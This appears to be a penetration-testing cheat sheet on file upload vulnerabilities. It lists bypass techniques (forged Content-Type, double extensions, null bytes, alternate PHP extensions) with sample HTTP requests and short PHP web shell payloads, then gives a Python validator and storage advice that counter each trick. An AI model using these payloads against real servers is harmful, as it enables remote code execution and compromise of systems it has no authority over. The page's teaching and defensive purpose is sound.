# Arbitrary File Upload

## Introduction

An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.

## Where to find

In file upload features, for example a profile photo upload feature.

## How to exploit

1. Change the Content-Type value

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   ...

   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: application/x-php
   ```

   Change the Content-Type:

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   ...

   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: image/jpeg
   ```

2. Try changing the extension when sending the request. For example, here you can't upload a file with the `.php` extension but you can upload a `.jpg` file

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   ...

   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
   Content-Type: application/x-php
   ```

   Change the request to this:

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   ...

   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: application/x-php
   ```

3. Upload the payload, but start it with `GIF89a;`

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   ...

   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: image/gif

   GIF89a; <?php system("id") ?>
   ```

   And don't forget to change the Content-Type to `image/gif`.


4. Bypass content-length validation; it can be bypassed using a small payload

   ```php
   <?=`$_GET[x]`?>
   ```

5. Use a null byte in the filename

   ```
   file.php%00.gif
   ```

6. Use double extensions for the uploaded file

   ```
   file.jpg.php
   ```

7. Upload an unpopular PHP extension (php4, php5, php6, phtml)

   ```
   file.php5
   ```

8. Try randomly capitalizing the file extension

   ```
   file.pHP5
   ```

9. Mix the tips!
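The server-side counterpart to the tricks above, as an added example that is not part of this page: a single validator that rejects every bypass listed here (Content-Type mismatch, `.php.jpg` / `.jpg.php` double extensions, `%00` null bytes, `php5`/`phtml` variants, `pHP5` case games, and a `GIF89a;` header followed by PHP). The `ALLOWED` and `EXECUTABLE` tables and the `validate_upload` function are assumptions of this example, not any framework's API.

```python
import os
import re
import secrets

# Allowlist: extension -> (expected Content-Type, accepted magic-byte prefixes)
ALLOWED = {
    "jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png":  ("image/png",  (b"\x89PNG\r\n\x1a\n",)),
    "gif":  ("image/gif",  (b"GIF87a", b"GIF89a")),
}
# Server-executable extensions, rejected wherever they appear in the name
EXECUTABLE = {"php", "php3", "php4", "php5", "php6", "php7", "phtml", "phar"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename, content_type, data):
    """Return (accepted, reason) or (accepted, server-chosen storage name)."""
    name = os.path.basename(filename.replace("\\", "/"))
    # Raw NUL or URL-encoded %00: file.php%00.gif must never reach the filesystem
    if "\x00" in name or "%00" in name.lower():
        return False, "null byte in filename"
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    # Every dotted segment is checked after case-folding, so file.php.jpg,
    # file.jpg.php and file.pHP5 are all rejected.
    if any(seg in EXECUTABLE for seg in parts[1:]):
        return False, "executable extension"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, "extension not on allowlist"
    expected_ct, magics = ALLOWED[ext]
    # The client-supplied Content-Type is untrusted; it must agree with the extension
    if content_type.split(";")[0].strip().lower() != expected_ct:
        return False, "content-type does not match extension"
    if not any(data.startswith(m) for m in magics):
        return False, "magic bytes do not match extension"
    # A valid image header followed by PHP (the GIF89a; trick) still carries code.
    # This tag scan is a cheap heuristic; re-encoding the image is the robust fix.
    if PHP_TAG.search(data):
        return False, "embedded script tag"
    # Never keep the client's name: store under a random, server-chosen name
    return True, f"{secrets.token_hex(16)}.{ext}"
```

Store accepted files outside the web root, or in a location where the web server is configured not to execute anything, so the filename checks are a second line of defence rather than the only one.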